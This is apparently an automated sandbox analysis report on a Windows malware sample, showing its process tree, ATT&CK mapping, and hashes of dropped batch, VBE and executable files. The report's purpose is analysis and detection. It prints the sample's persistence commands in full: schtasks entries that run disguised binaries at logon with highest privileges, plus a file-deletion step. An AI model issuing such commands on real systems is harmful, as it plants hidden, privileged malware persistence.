        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3908
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        32⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2376
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EjpRfFHJ5y.bat"
        33⤵
        
        PID:4064
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        34⤵
        
        PID:3212
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        34⤵
        
        PID:3888
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        34⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1804
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xKIkDfuouO.bat"
        35⤵
        
        PID:3124
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        36⤵
        
        PID:2024
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        36⤵
        
        PID:4328
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        36⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:400
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UE63U4pwcK.bat"
        37⤵
        
        PID:4424
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        38⤵
        
        PID:380
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        38⤵
        
        PID:4148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe
  2⤵
  PID:4380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Cookies\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\Default\Cookies\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Cookies\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "privatep" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Common Files\System\private.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "private" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\System\private.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "privatep" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Common Files\System\private.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 7 /tr "'C:\Windows\ShellExperiences\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Windows\ShellExperiences\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 11 /tr "'C:\Windows\ShellExperiences\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 10 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chainreviewwinrefSvc" /sc ONLOGON /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 8 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat

Filesize
98B

MD5
4dafd9e9509ac96be6aa5baec659da4d

SHA1
a091552663ddea89536560f232b8339f318c9cbc

SHA256
0c53b640295abd25e8387957941e29f5c4e765376365409164ac39e3365a6ccf

SHA512
d290c162347e236e0e197c52afc4f4b33f1eba2498dfe2ad86c414c87ab70c9fbbd2132cd08bfb4137e8555a095ca9acb6675727a4a5f65ccc46141c16698132

Download Submit
C:\ComponentCrt\chainreviewwinrefSvc.exe

Filesize
1.8MB

MD5
11cca9e2c6dc9c2a728b89e7314ec26a

SHA1
58aec3b662a1c4e8b43cc454d90813ac89b5e612

SHA256
300072795259e7b2baa69a7a3d19ffea1844dffc391e710c654aa1b66b0e2197

SHA512
fb1fcff1c94e73b1227f65b237639e25604d614cfe365f2108bbbfdb489b97410fdc17411b8f00fc5b8f57d51080b4496010537a6a4ff9b15b7bdd24f89d0df7

Download Submit
C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe

Filesize
207B

MD5
b292d233456b16f26abc1aa07c9f5de0

SHA1
7b025705136101b5618d81d8ebf472335eebde43

SHA256
e75d13d4b079fafbd413fa8182c270f1f0f41b1b19b3469db12de226fed67b2d

SHA512
1c9c3846ab0e392dc6833de2a9238c91b6042b5095521196a3ceae8830edf7fb6d73118ed023b2e2daf287a48084fa8ee40241248a231cf668d5cc5e8f947ee4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chainreviewwinrefSvc.exe.log

Filesize
1KB

MD5
af6acd95d59de87c04642509c30e81c1

SHA1
f9549ae93fdb0a5861a79a08f60aa81c4b32377b

SHA256
7521ee2d065a78efcab55a194fbd78492f84b70595f139263875f4ea92b194d6

SHA512
93ab99bcf588fde553de3240e0d2b0cbd4e4bc5ef5e99d53f45a267d7ff30103a80b5a7aa1c52d6eff1e070af0ec82d2c0b8aafb7099742aa16810edc1815c3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\02n8fxtMT9.bat

Filesize
168B

MD5
f77e2efb7ac6cf01c1468babdda66e87

SHA1
1c4711f4c4b570b3eda988191be5be6d68fdd148

SHA256
26c1ad0427ea9c8785f8eb234fe7d6322a70d008d9b05735ca45ef0233f61765

SHA512
ad69b664e156f78c796e924f5c49921a594ff58eee4dc203770ba0852e8b9a096fe23a11177518ed7c34454016f2e1bce47a9812abf53ab21b34490060c4feb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1v3DIijE8M.bat

Filesize
216B

MD5
5fd26ff7e0c377e6cd04494447156927

SHA1
b249448c24a2c782372ccf66b213019c3e9a6c85

SHA256
7e6fdeb473e6bea2c97638839e79f1033040fd2c247403330bf8e9890f2fce7e

SHA512
f56e8989bfa8d449da2bedc7c32988c08cd36f2c6bda7fe0eab0dc11859f4ff2700907839a29eea017001ba269478388678659a0dd8e3ffca28bd25d4bf7e1a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\2vzlDYcv1s.bat

Filesize
168B

MD5
629fa7b78d4ffba18f9b467af15f6aa9

SHA1
edcb7eb4caa4501eedbf94b804a7327ccbf7fe53

SHA256
845598cb81d08dfe2277ba4233399c2e03c60bd7346dd6263f14aa7fc442f3d3

SHA512
0ee6e7816013520ee164c9978a14604916a6446421fd053f1578b940e02861c00dc6bb548d3e1149fb8654e8afa9bc9cbe1d088161fe34c7fb45538e60d0f3cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7sJHAbaLmY.bat

Filesize
216B

MD5
6ada387d2535e7a575b32c4f08124613

SHA1
cfa6eb78ddbe82f7b57ed90d11aa14b19f1cecd4

SHA256
06d25bb66ae36ebbbc461b1d8593b47a23041e643b2310eda74e668ea6bdf884

SHA512
cd5b6d08185967999cde3b90f9a7dec3de4295b98a7f7f69365545c9a649e66f09a2bc5fe8717f6aed0057a80285128edb625e039dc8f548f2da014e1782b81e

Download Submit
C:\Users\Admin\AppData\Local\Temp\9mWviDJuKI.bat

Filesize
168B

MD5
ff3e601135165ab0a60b0e66d309e977

SHA1
7537f2cd75f157963db9666cf96775d36ad8ddf2

SHA256
388b0e861dd37eb8287da8f20d7fe395585adeb3bb7305599b5aa350c73fde2b

SHA512
3c561520b0dc26557ae1c4745afdf3f905d699a45c2fcf55d7f7106eeb4de277bcd69a13abd8f05ed5521ee631ffd428defe9cfc856697e50449d64b016afad9

Download Submit
C:\Users\Admin\AppData\Local\Temp\EjpRfFHJ5y.bat

Filesize
216B

MD5
7face7d154e13ed9f2dbc3d9347aaf87

SHA1
2c12a9b06a7938c0190956d8d50756ec1d24cfe3

SHA256
224f0e2fa93320447fd31fb3a4bd33cc5e65e7fd7f00375a15cc129e048bdfdb

SHA512
987ade9a4f3736b606d9f07641d010007eb57ae19e4a463537da51d29a9e0230d665a4ad295b122220a9b208da4fa124025d1b1aa847d2b70f20ebc411d5a2e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\JRGN3N9ZXF.bat

Filesize
168B

MD5
6c88e166f4913f0a4b3a45a13dca7163

SHA1
dcd089d3e209fc50e6bd15fa38df1f758a7c8503

SHA256
246b791c6d1976e45bdff0e9de8384c5fc01da1269151b1b175c9accdf95b10f

SHA512
30a0a7f0b7966b6cf543c736cddf7b4f99dc36ffd6f9f504fd5171c9d779ab1095c0ffca5bfd7a570624314bf9f19463c6000a2ab7131f570ae6ec45f9bafc93

Download Submit
C:\Users\Admin\AppData\Local\Temp\UE63U4pwcK.bat

Filesize
216B

MD5
3611b14722c9741c2a6b418bad046ef9

SHA1
162472cadac19ede9e0adb38f5ad09c6d69cd06e

SHA256
57f949229d3c06847074f9edde98ea3645775630330dea4b9d1732566591b3bd

SHA512
19054a144188713415a92c7181d66cc6cbb13d45eb10177ef752d68b1d903b4c483e370b7f4b39faebe60694c0e7c7eeabfb1ce13ba25318145a86c67a5d5b9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\aqn4VxW4jp.bat

Filesize
168B

MD5
27b3950bb532f26141ac3e79e5521bb6

SHA1
f852ee06953d9e8be46e105bb74bf186a02adb85

SHA256
db9c6be730f9760d86d95920388176c8e797585f08bf8873ba5f7ea10087144d

SHA512
fee353cd2d5a75371cc25b6cfa288135c70ca8b027324ac6c77fe0c6b5785cc4866866ea3a332cce4a620828c77cfb7472d5cc793e1f7e89158f8c863bbd0a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cmDFbQQIZ6.bat

Filesize
168B

MD5
6849087a0a343cf58cd350e68792496f

SHA1
35af53dd4278ce8c561eacd664a9f8b7c776e1a2

SHA256
c7889980049ec7520054802d562ab89c3ad1505a4ea3f4e408cc7e07fa6e9473

SHA512
7c2849f6b1ec4918da41b593a43c2b6ea3c3950d0b9e5cc82e6f56576b80fdc7b766b22cbe20805433e3d43947d056e737234879ef0b1f8f52e065df88468083

Download Submit
C:\Users\Admin\AppData\Local\Temp\lkMeKtMa8h.bat

Filesize
216B

MD5
b84c240b6c711ee45a3b67746abbb2f8

SHA1
b0c958b7c2a87fe5f9c8c9f9de69fa2dd0725e37

SHA256
5355240b0bd9fe14148879f86cac6545c0ba13bbc01ff6bce06ea84606a7d2de

SHA512
f7293198f9abb794d3b6cfef8bc752e69ee0bffbd541e8d18401b939d63287fcfc0c9449ddc8371ada3d8f6f597ce366f4ee3f5c5367422324b0e3936ef78f13

Download Submit
C:\Users\Admin\AppData\Local\Temp\nE1uIQLIWX.bat

Filesize
216B

MD5
9064580797fae65f883b084bb18a7120

SHA1
911418283227d283a967f8037ddc6bd12bb40f3f

SHA256
af72f414e09ce55f25843fc77a92abfe2d6ecbe5d45bbe929aab779cf62b6656

SHA512
c0f78717f94f971f2a408d2cb184b5bbe8fa882412f02a07e7c6937b40327d74adad67ed8d9a015d3a0def884ad9687df90f59fcea3a8761191e186f2bfc78de

Download Submit
C:\Users\Admin\AppData\Local\Temp\tV5RM9l7zq.bat

Filesize
168B

MD5
eabaabc876fc5cad1d0521d1db8a11cb

SHA1
b0856d3a86fbcfd980b7f9782ac25cad5f4231a9

SHA256
6e08a2dc0966a0bbb5d1fd58bfe356fdb2160692925df4d9751393e206526b97

SHA512
5ad98ea4183468a0862c42de557e1df8cbc9197098afbbe973ca4d35717589931792a1e3244f93cda2551f8a2efb8d2210eae2487e101de6aacb8217d468821f

Download Submit
C:\Users\Admin\AppData\Local\Temp\wykhLflpMg.bat

Filesize
216B

MD5
2245681dce99867e69a9bb0f933e5abf

SHA1
ab3c6c3d9c093b3ec79b629c0d9cff35afd188dc

SHA256
ee110602322e9a5aff4fd5eb08d07626d4eafcebf1d613953ad645c13de76fcd

SHA512
9524c2b6d5413cd1141611bac388dc7bbe746f433d085a118018430ee55bb561ccaf9e41f2b2d44446fcdc1477f0263a8af8a4db4fe9fa125e2d1c33ccae59a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\xKIkDfuouO.bat

Filesize
216B

MD5
f73744397042d782243d01a269250aa1

SHA1
866cd45c6f9de933af8fa022e17ee1bb7d9d95d1

SHA256
8157dec728e076d619a5e309534ecf4924c14147c2249d344550b75f6b46d4d9

SHA512
fd4787e22a49fe2920b2e6268a8c1ad3546c0789dee2b04c9a718a05561868e56ec40223e91d3ead5518d35673d6a39d364b0c2cd94e4fc7153ddfad87e3b80f

Download Submit
C:\Windows\Speech\client.exe

Filesize
2.1MB

MD5
bf4f13d82d217ed69d80124c50d9441c

SHA1
b7ee7d109f61371342e924e6a0c3505347dd318f

SHA256
51890bfc6f223014ff16f4bfa6ace8e2d2ec3c81eb6965406813b9ca32b08508

SHA512
1ba17e55d6d1f6fda99daffe3f11f995d5e8434901b2aea9105728ccbff1b81727d96bf8811a62e8367fca0ec23bdea331165b001088b183281164269668d2f4

Download Submit
memory/616-107-0x000000001C0B0000-0x000000001C1B2000-memory.dmp

Filesize
1.0MB

Download
memory/1448-25-0x0000000002C10000-0x0000000002C1C000-memory.dmp

Filesize
48KB

Download
memory/1448-23-0x000000001B630000-0x000000001B648000-memory.dmp

Filesize
96KB

Download
memory/1448-21-0x000000001B680000-0x000000001B6D0000-memory.dmp

Filesize
320KB

Download
memory/1448-20-0x000000001B610000-0x000000001B62C000-memory.dmp

Filesize
112KB

Download
memory/1448-18-0x0000000002A60000-0x0000000002A6E000-memory.dmp

Filesize
56KB

Download
memory/1448-16-0x0000000000700000-0x00000000008DA000-memory.dmp

Filesize
1.9MB

Download
memory/2260-96-0x000000001B970000-0x000000001BA72000-memory.dmp

Filesize
1.0MB

Download
memory/2288-74-0x000000001B3A0000-0x000000001B4A2000-memory.dmp

Filesize
1.0MB

Download
memory/4048-63-0x000000001BA50000-0x000000001BB52000-memory.dmp

Filesize
1.0MB

Download
memory/4852-85-0x000000001B920000-0x000000001BA22000-memory.dmp

Filesize
1.0MB

Download